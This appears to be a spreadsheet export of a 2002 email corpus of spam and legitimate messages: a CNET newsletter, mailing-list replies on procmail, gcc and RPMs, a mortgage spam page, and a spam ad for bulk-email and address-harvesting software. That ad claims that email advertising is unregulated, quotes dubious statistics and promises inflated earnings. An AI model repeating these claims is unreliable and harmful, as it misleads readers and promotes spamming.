 				&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#cccccc" width="410"&gt;
 					&lt;tr&gt;
 						&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#ffffff" width="410"&gt;
 					&lt;tr&gt;
 						&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="10" border="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;font face="arial, helvetica"&gt;
 &lt;!-- News Story #1 --&gt;
 					&lt;font size=-1&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QBLS9RqDFWVhZSgRXBsR" &gt;&lt;b&gt;AMD to unveil chip amid earnings woes&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 					&lt;/font&gt;
 					&lt;font size="-1"&gt;
 						Advanced Micro Devices will have good news for customers this 
    week, but bad news for investors. 
 					&lt;/font&gt;
 &lt;p&gt;&lt;!-- News Story #2 --&gt;
 					&lt;font size=-1&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZHloK_TNHOiJGu_NEsnEPR" &gt;&lt;b&gt;Rambus revenue up from year ago&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 					&lt;/font&gt;
 					&lt;font size="-1"&gt;
 						Rambus, a developer of technology that speeds the performance 
    of computer-memory chips, on Thursday reported fiscal third-
    quarter earnings that rose from a year ago as revenue steadied.
 					&lt;/font&gt;
 &lt;p&gt;&lt;!-- News Story #3 --&gt;
 					&lt;font size=-1&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnP6PLR51T53xlZk0f-IonR" &gt;&lt;b&gt;Server company releases new AMD model&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 					&lt;/font&gt;
 					&lt;font size="-1"&gt;
 						Angstrom Microsystems, a small Boston company specializing in 
    thin servers, has released a new model that squeezes two servers, 
    each with two Advanced Micro Devices Athlon 2100+ processors, into 
    a case that's 1.75-inches, or "1U," thick. The system, designed to 
    be bolted into regular 19-inch racks, typically costs between 
    $4,000 and $5,000, depending on configuration options, spokeswoman 
    Rachel Sun said. 
 					&lt;/font&gt;
 					&lt;/font&gt;
 				&lt;/font&gt;
 &lt;p&gt;&lt;!--Tip of the Week --&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/sub_tip.gif" alt="Tip of the week" width="150" height="19" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#cccccc" width="410"&gt;
 					&lt;tr&gt;
 						&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#ffffff" width="410"&gt;
 					&lt;tr&gt;
 						&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="10" border="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;font face="arial, helvetica"&gt;&lt;font size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcoNyDzsJqwuBXvl3NU2rR" &gt;&lt;b&gt;Tune-Up: The mother of all upgrades&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-1"&gt;Looking to completely overhaul your PC? Start by replacing 
    your motherboard.&lt;/font&gt;
 &lt;p&gt;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 enables you to streamline your 
 sales process by building quotes and orders online? 
 &lt;P&gt;
 Simply select a customer you've previously entered into 
 ChannelOnline's database and their company information, and
 a customized price profile is automatically applied to their 
 quote. You can add products as you search the product database 
 and work on multiple quotes at once as you respond to different 
 customer requests throughout the day. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJ4gwp9pSjaeTldfVpfRR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to streamline your entire buying and selling chain. 
  &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_AWZz1y0dAVJ9PZAKTFR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddpiRPYWr9i_f_B0NLncR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKscR9uzgWdT_pfmeDx0RR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb82osNkvpmtTwxp6DtFR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg40yIUqud2fqfAgMcXea9R" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8W7tfd-BifnODtxI8fiiuR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXHbC-5bpod5q0_HZB17WsR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWWwvBz7A8IeOdSKzjX19R" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6r6jkZax-EDvznhjonleR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIKnCJGw24YOLpk6Td6yR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLA63gjPFw3RXvLF34ULXPR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tk7pn37VZsihsBSWgp7dR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTQq4q5Nh2H3f2jvrqULcR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1PSl52a28-mhe2RYEVuRR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLxcfUdEECZ5znP-FdWuuFR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMzjyzgdmkSWreAgRDc9R"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=ee-ZbSWrtDPx4XY8RbUrzEIh13ZG9875sRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzdxDMmMdhKQcaLlAI6OFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qUhmywbgTiMEyR1N6759R"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href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcl3OhZgVdngyV7VDjSuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKS0AvxQ3Spz3F7_4EMIryR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04AAfw6t-F0F_wt9Q9dZPR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQ_SA8tbKQCL5-NPyEdnR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8sz4uo7pqfRO9R6BpKcR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduI930kmZjZWSoS2P4JmRR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e438&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ac-RbIt-aUIo8eDZM4UP_b0nJ1uDdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: May I have a moment of your Time PLEASE
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Can someone please tell me how to get an answer from
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 16 Sep 2002, Justin Mason wrote:
 &gt; Simon Matthews said:
 &gt; 
 &gt; &gt; Procmail 3.21 is reliable as long as none of the recipies fails. I was 
 &gt; &gt; hoping to resolve the triplets.txt problem and thus avoid the procmail 
 &gt; &gt; "^rom" problem. 
 &gt; 
 &gt; I doubt it's related, actually -- the "triplets" stuff is in a totally
 &gt; unrelated area of code.
 The procmail bug happens when the filter program does something that 
 procmail doesn't expect.  Exactly what that something is, hasn't been
 confirmed by anyone on the procmail list.  It might be exiting with a
 nonzero status, or it might be producing output on the standard error,
 or it might be something else entirely.
 So Simon is attempting to get SA to run flawlessly, because then it can't
 tickle the procmail bug.  This isn't a fix, it's a band-aid, but because
 he apparently doesn't have the option of installing a newer procmail ...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hey, rates are low. What are you waiting for?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;www.low-interest-rates.net&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
 td {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 12px;
 	color: black;
 }
 text {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 11px;
 	color: black;
 }
 text2 {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 12px;
 	color: black;
 }
 header {
 	font-family: Trebuchet MS, Verdana, Tahoma, sans-serif;
 	font-size: 17px;
 	color: white;
 }
 title {
 	font-family: Trebuchet MS, Verdana, Tahoma, sans-serif;
 	font-size: 20px;
 	color: #D6CFAB;
 	font-weight: bold;
 }
 h4 {
 	color: #B5C943;
 	font-family: Tahoma, sans-serif;
 }
 footer {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 10px;
 	color: white;
 	font-weight: bold;
 }
 a.footer {color: white; text-decoration: none;}
 a.footer:visited {color: white; text-decoration: none;}
 a.footer:hover {color: white; text-decoration: underline;}
 button {
 	font-size: 11px;
 	border-width: 0;
 	background-color: #476f8f;
 	color: white;
 	font-family: Verdana, Tahoma, sans-serif;
 	font-weight: bold;
 }
 #selected {
 	color: #F5989D;
 	text-decoration: none;
 }
 clicker {cursor: hand}
 a {color: white; text-decoration: none;}
 //--&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body leftmargin=3D10 topmargin=3D15 marginwidth=3D10 marginheight=3D15&gt;
 &lt;FORM action=3D method=3Dpost&gt;
 &lt;div&gt;
 &lt;table width=3D"100%" cellspacing=3D0 cellpadding=3D0 border=3D0&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D#D6CFAB&gt;
 &lt;center&gt;
 &lt;br&gt;
 &lt;table width=3D540 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D#F5989D height=3D50 class=3Dheader align=3Dleft&gt;&amp;nbsp;&amp;nbsp;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;quotepool&lt;/b&gt;mortgage&amp;#153;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor=3Dwhite align=3Dcenter&gt;
 &lt;table width=3D490 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td align=3Dleft class=3Dtext&gt;
 &lt;br&gt;
 We're different and it's a difference that can save you time and money.&lt;br=
 &gt;
 We &lt;b id=3Dselected&gt;can&lt;/b&gt; help you:&lt;br&gt;&lt;br&gt;
 	&lt;table width=3D490 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 	&lt;tr&gt;&lt;td width=3D25 align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dte=
 xt2&gt;&lt;b&gt;Refinance&lt;/b&gt; to get a lower rate&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;&lt;b&gt;Cons=
 olidate&lt;/b&gt; your high-interest debt&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;&lt;b&gt;Lowe=
 r&lt;/b&gt; your monthly payments&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;Get &lt;b&gt;=
 extra cash&lt;/b&gt; for a vacation&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;Pay for=
  &lt;b&gt;tuition&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;Start h=
 ome &lt;b&gt;improvements&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;&lt;b&gt;Purc=
 hase&lt;/b&gt; a New Home&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;br&gt;
 &lt;p class=3Dtext&gt;We understand that there are a lot of decisions to make wh=
 en securing a mortgage loan or refinancing your current loan.  That's why =
 we have mortgage EXPERTS with years of EXPERIENCE to help you make the rig=
 ht decisions.  
 &lt;p class=3Dtext&gt;Credit doesn't have to be an issue either.  Whether your c=
 redit's perfect or less than perfect, we can help you find the best deal o=
 n your home loan. Our quick, FREE, easy form will put you in contact with =
 the top brokers in the business!&lt;br&gt;
 &lt;b&gt;DON'T Miss The Opportunity to SAVE!&lt;/b&gt;
 &lt;p class=3Dtext&gt;Now is the perfect time to secure your mortgage loan.  Wit=
 h our country in a recession, the federal government keeps LOWERING INTERE=
 ST RATES to help stimulate the economy.  It is a win-win situation and it =
 benefits mostly YOU, the homeowner! &lt;b&gt;Try it now!&lt;/b&gt;
 &lt;p class=3Dtext&gt;&lt;b&gt;There are NO excuses. There are great rates available, =
 it's a simple form, and it costs you NOTHING to fill out for a FREE quote.=
 &lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;table cellspacing=3D1 cellpadding=3D0 border=3D0 align=3Dright&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D#F5989D width=3D150 height=3D25 align=3Dcenter&gt;&lt;a href=3D"ht=
 tp://www.low-interest-rates.net/"&gt;&lt;b&gt;PROCEED HERE&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D100&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D540 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td width=3D484 height=3D30 align=3Dleft bgcolor=3D#F5989D class=3Dfooter&gt;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href=3D"http://www.low-interest-rates.net/etc/=
 privacy.htm" class=3Dfooter&gt;Privacy&lt;/a&gt; | &lt;a href=3D"http://www.low-intere=
 st-rates.net/etc/unsubscribe.htm" class=3Dfooter&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/div&gt;
 &lt;/FORM&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "rssflowersalignright"I've gotten to know Phil Ringalda over the
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:59:58PM
 Date: Tue, 24 Sep 2002 03:59:58 GMT
 "rssflowersalignright"I've gotten to know Phil Ringalda over the last few weeks 
 in all the discussions about RSS 2.0, and I like him, and would like to work 
 with him in the future. I don't say that lightly. This evening he posted a note
 [1] on his weblog that he was giving up trying to get RDF to make sense inside 
 RSS. As I read his essay I could feel two-plus years of exhaustion overwhelm 
 me. I found myself writing a comment after his essay saying, among other things 
 "RSS is not a brilliant format. It is a compromise. It is for syndicating news 
 feeds. That's all it is for, for the 18,000th time." It's time for RDF to pack 
 its bags and leave. RSS deserves some dignity, as does RDF. Emphatically, once 
 and for all, they are not the same thing. Peace be with you RDF. Leave RSS 
 alone. Thank you.
 [1] http://philringnalda.com/archives/002330.php
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 12:17:21AM +0300, Ville Skytt wrote:
 &gt; On Fri, 2002-07-26 at 12:52, Harri Haataja wrote:
 &gt; &gt; Another thing I see in debian but not in my RH boxen.
 &gt; &gt; http://falconseye.sourceforge.net/
 &gt; &gt; It's a GL(?) interface to nethack :)
 &gt; Take a look at &lt;http://cachalot.ods.org/&gt;, I have RPMs for RH7.3
 &gt; there, based on (and compatible with) the NH3.x that last appeared in
 &gt; RH7.1 powertools.  apt'able, of course :)
 And Text-Iconv too, nice :)
 Gpg key is nowhere in sight though even while vendors.list lists key
 id's.
 -- 
 &lt;@zomby[tm]&gt; tea is just like noodle soup without noodles
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthew French wrote:
 &gt;&gt;Happiness was restored to the world with gcc 2.95 and later.
 &gt; I do not have the time to follow the compiler "wars", but I notice that I
 &gt; must use egcs to build 64 bit SPARC code.
 2.95 was where the reintegration effort started and work on the other 
 projects fell away. 3.0 was the target for completion of that work.
 &gt; GCC 3 should do it, but because it is so "buggy"[1] it is not worth trying
 &gt; to use unless you really want to track down those compiler errors... :(
 A lot of those problems seem to have been shaken out by Redhat's ballsy 
 gcc 2.96 stunt. I've been trying out RedHat Limbo for a few weeks now, 
 equipped with gcc 3.1. I haven't fallen foul of compiler issue so far, 
 that I'm aware of anyhow. That said I'm glad I don't do much C++ - seems 
 pretty much every version of gcc (2.95, 2.96, 3.0, 3.1, and the 
 forthcoming 3.2) breaks C++ binary compatibility in some way or other.
 Paul.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Advertise to 28,000,000 for FREE...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Would you like to send a Broadcast Email Advertisement to up to
 1,000,000+ PEOPLE DAILY (30,000,000+ People a Month) for FREE?
 ----- ---- --- -- -  -
 1) Let's say you... Sell a $19.95 PRODUCT or SERVICE.
 2) Let's say you... Broadcast Email to 500,000 PEOPLE DAILY.
 3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.
 CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:
 [Day 1]: $3,990  [Week 1]: $27,930  [Month 1]: $111,720
 ----- ---- --- -- -  -
 You now know why you receive so many email advertisements...
 ===&gt; BROADCAST EMAIL ADVERTISING IS EXTREMELY PROFITABLE!
 1) What if you... Sell a $99.95 PRODUCT or SERVICE?
 2) What if you... Broadcast Email to 30,000,000+ PEOPLE MONTHLY?
 3) What if you... Receive 1 ORDER for EVERY 250 EMAILS?
 Just IMAGINE =&gt; DAY 30! ==&gt; WEEK 30!! ===&gt; MONTH 30!!!
 ==&gt; The PROFITS that Broadcast Email CAN GENERATE are AMAZING!
 ** According to Forrester Research, a Broadcast Email Ad is up to
 ** 15 TIMES MORE Likely to Result in a Sale than a Banner Ad!
 ----- ---- --- -- -  -
 [COMPARISON OF INTERNET ADVERTISING METHODS]:
 ==================================================================
 =&gt; A 1/20 Page Targeted Web Site Banner Ad to 5 Million People
    on the Internet can cost you about $100,000.
 =&gt; A 5 Page Targeted Direct Mail Advertisement to 1 Million People
    through the Postal Service can cost you about $500,000.
 =&gt; A 50 Page Targeted HTML Broadcast Email Advertisement with
    Pictures to 50,000,000 People through the Internet is Free.
 ..Which advertising method sounds most appealing to you?
 ==================================================================
 "Targeted direct email advertising is the wave of the future.
  By no other means can you effectively reach your market so
  quickly and inexpensively." - ONLINE PROFITS NEWSLETTER
 "Many business people are finding out that they can now advertise
  in ways that they never could have afforded in the past.  The
  cost of sending mass e-mail is extremely low, and the response
  rate is high and quick." - USA TODAY
 ---- --- -- -  -
 [EXAMPLE OF A PERSONALIZED/TARGETED BROADCAST EMAIL]:
 -------- ------- ------ ----- ---- --- -- -  -
 From: kate@cattiesinc.com
 To: mary@commtomm.com
 Subject: Cat Information!
 Hi Mary,
 Are you interested in receiving up to 80% SAVINGS on CAT SUPPLIES?
 If so, come visit our web site at: http://www.cattiesinc.com
 ==================================================================
 =&gt; With Broadcast Email Software, a Broadcast Email Advertisement
 =&gt; like this one can be AUTOMATICALLY sent to up to 1,000,000 
 =&gt; PEOPLE on a DAILY BASIS with LESS than 2 MINUTES of YOUR TIME!
 "IMT Strategies Reports an Average of a 16.4% CLICK THROUGH RATE
  from users that have received a Broadcast Email Advertisement!"
 ----- ---- --- -- -  -
 Our Broadcast Email Software with DNS Technology Automatically
 Creates 10 SUPER-FAST MAIL SERVERS on Your COMPUTER used to Send
 out Your Broadcast Emails Directly to the Recipients!
 ==&gt; With this NEW EMAIL SENDING TECHNOLOGY... 
 ==&gt; Your Internet Provider's Mail Servers are NOT USED!
 There are NO Federal Regulations or Laws on Email Advertising &amp;
 Now with our Software, You Can Avoid Internet Provider Concerns!
 ---- --- -- -  -
 BE PREPARED!  You may receive A HUGE AMOUNT of orders within
 minutes of sending out your first Broadcast Email Advertisement!
 * According to Digital Impact, 85% of Broadcast Email Offers are
   responded to within the FIRST 48 HOURS!  (IMMEDIATE ORDERS!)
 "When you reach people with e-mail, they're in a work mode, even
  if they're not at work.  They're sitting up, they're alert.  You
  catch them at a good moment, and if you do it right, you have a
  really good shot of having them respond."
  - WILLIAM THAMES [Revnet Direct Marketing VP]
 * An Arthur Anderson Online Panel Reveals that 85% of Online Users
   say that Broadcast Email Advertisements have led to a purchase!"
 ==================================================================
 =&gt; If you send a Broadcast Email Advertisement to 50,000,000
 =&gt; People and Just 1 of 5,000 People Respond, You Can Generate
 =&gt; 10,000 EXTRA ORDERS!  How Much EXTRA PROFIT is this for You?
 ==================================================================
 "According to FloNetwork, US Consumers DISCOVER New Products and
  Services 7+ TIMES MORE LIKELY through an Email Advertisement,
  than through Search Engines, Magazines and Television COMBINED!"
 Only a HANDFUL of Companies on the Internet have Discovered
 Broadcast Email Advertising... =&gt; NOW YOU CAN BE ONE OF THEM!!
 ** United Messaging says there are 890+ MILLION EMAIL ADDRESSES!
 ** GET READY!  Now with Broadcast Email, You Can Reach them ALL!
 ------ ----- ---- --- -- -  -
 As Featured in: "The Boston Globe" (05/29/98),
 "The Press Democrat" (01/08/99), "Anvil Media" (01/29/98):
 ==================================================================
 [NIM Corporation Presents]: THE BROADCAST EMAIL PACKAGE
 ==================================================================
 REQUIREMENTS: WIN 95/98/2000/ME/NT or MAC SoftWindows/VirtualPC
 =&gt; [BROADCAST EMAIL SENDER SOFTWARE] ($479.00 Retail):
     Our Broadcast Email Sender Software gives you the ability to
     send out Unlimited, Personalized and Targeted Broadcast Email 
     Advertisements to OVER 500,000,000 People on the Internet at
     the rate of up to 1,000,000 DAILY, AUTOMATICALLY and for FREE!
     Have a List of Your Customer Email Addresses?  Now you can
     Broadcast Email Advertise to them with our software!
 =&gt; [TARGETED EMAIL EXTRACTOR SOFTWARE] ($299.00 Retail):
     Our Targeted Email Extractor Software will Automatically
     Navigate through the TOP 8 Search Engines, 50,000+ Newsgroups,
     Millions of Web Sites, Deja News, Etc.. and Collect MILLIONS
     of Targeted Email Addresses by using the keywords of your
     choice!  This is the ULTIMATE EXTRACTOR TOOL!
 =&gt; [28,000,000+ EMAIL ADDRESSES] ($495.00 Retail):
     MILLIONS of the NEWEST &amp; FRESHEST General Interest and
     Regionally Targeted Email Addresses Separated by Area Code,
     State, Province, and Country!  From Alabama to Wyoming,
     Argentina to Zimbabwe!  28,000,000+ FRESH EMAILS are ALL YOURS!
 =&gt; [STEP BY STEP BROADCAST EMAIL PACKAGE INSTRUCTIONS]:
     You will be Guided through the Entire Process of Installing
     and Using our Broadcast Email Software to Send out Broadcast
     Email Advertisements, like this one, to MILLIONS of PEOPLE for
     FREE!  Even if you have NEVER used a computer before, these
     instructions make sending Broadcast Email as EASY AS 1-2-3!
 =&gt; [THE BROADCAST EMAIL HANDBOOK]:
     The Broadcast Email Handbook will describe to you in detail,
     everything you ever wanted to know about Broadcast Email!
     Learn how to write a SUCCESSFUL Advertisement, how to manage
     the HUNDREDS of NEW ORDERS you could start receiving, what
     sells BEST via Broadcast Email, etc...  This Handbook is a
     NECESSITY for ANYONE involved in Broadcast Email!
 =&gt; [UNLIMITED CUSTOMER &amp; TECHNICAL SUPPORT]:
     If you ever have ANY questions, problems or concerns with
     ANYTHING related to Broadcast Email, we include UNLIMITED
     Customer &amp; Technical Support to assist you!  Our #1 GOAL is
     CUSTOMER SATISFACTION!
 =&gt; [ADDITIONAL INFORMATION]:
     Our Broadcast Email Software Package contains so many
     features, that it would take five additional pages just to
     list them all!  Duplicate Removing, Automatic Personalization,
     and Free Upgrades are just a few of the additional bonuses
     included with our Broadcast Email Software Package!
 =&gt; ALL TOGETHER our Broadcast Email Package contains EVERYTHING
    YOU WILL EVER NEED for your entire Broadcast Email Campaign!
 ** You Will Receive the ENTIRE Broadcast Email Package with
    EVERYTHING Listed Above ($1,250.00+ RETAIL) for ONLY $499.00!
 ==================================================================
 =&gt; BUT WAIT!!!  If You Order by Friday, June 29th, You Will
    Receive the ENTIRE Broadcast Email Package for ONLY $295.00!!
 ==================================================================
 Regardless, if you send to 1,000 or 100,000,000 PEOPLE...
 You will NEVER encounter any additional charges ever again!
 Our Broadcast Email Software sends Email for a LIFETIME for FREE!
 ----- ---- --- -- -  -
 Since 1997, we have been the Broadcast Email Marketing Authority.
 Our #1 GOAL is to see YOU SUCCEED with Broadcast Email Advertising.
 We are so confident about our Broadcast Email Package, that we are
 giving you 90 DAYS to USE OUR ENTIRE PACKAGE FOR FREE!
 ==&gt; You can SEND Unlimited Broadcast Email Advertisements!
 ==&gt; You can EXTRACT Unlimited Targeted Email Addresses!
 ==&gt; You can RECEIVE Unlimited Orders!
 If you do not receive at least a 300% INCREASE in SALES or are not
 100% COMPLETELY SATISFIED with each and every single aspect of our
 Broadcast Email Package, simply return it to us within 90 DAYS for
 a 100% FULL REFUND, NO QUESTIONS ASKED!!
 Best of ALL, if you decide to keep our Broadcast Email Package, it
 can be used as a 100% TAX WRITE OFF for your Business!
 ---- --- -- - -
 See what users of our Broadcast Email Package have to say...
 ==================================================================
 "Since using your program, I have made as much in two days as I
  had in the previous two weeks!!!!!  I have to say thank you for
  this program - you have turned a hobby into a serious money
  making concern."
  = W. ROGERS - Chicago, IL
 "We have used the software to send to all our members plus about
